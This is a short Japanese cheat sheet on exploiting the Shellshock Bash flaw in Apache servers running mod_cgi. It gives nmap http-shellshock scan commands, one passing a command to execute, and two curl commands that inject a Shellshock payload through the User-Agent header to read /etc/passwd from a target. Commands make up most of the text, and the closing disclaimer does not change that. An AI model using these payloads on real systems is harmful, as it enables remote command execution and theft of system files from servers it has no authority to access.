
"Shellshock"脆弱性の悪用。mod_cgiを使用したApacheでのリモートコード実行。
Shellshock は実質的に BASH におけるリモートコマンド実行の脆弱性です。このスクリプトは、mod_cgi が有効な Apache または類似の Web 環境で脆弱性を悪用します。脆弱性は環境変数の操作にあり、環境変数はコンピュータ上のプロセスがどのように実行されるかに影響を与える動的な名前付きの値です。攻撃者は悪意のあるコードを環境変数に付加することでこれを悪用し、変数を受信するとコードが実行されます。これにより攻撃者はシステムを危険にさらす可能性があります。
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
私は、このツールによって引き起こされる違法な使用や損害について一切の責任を負いません。これは楽しみのために書かれたものであり、悪意のためではありません。ハッキングとサイバーセキュリティに関する認識を高めることを目的としています。
良いハッキングを :)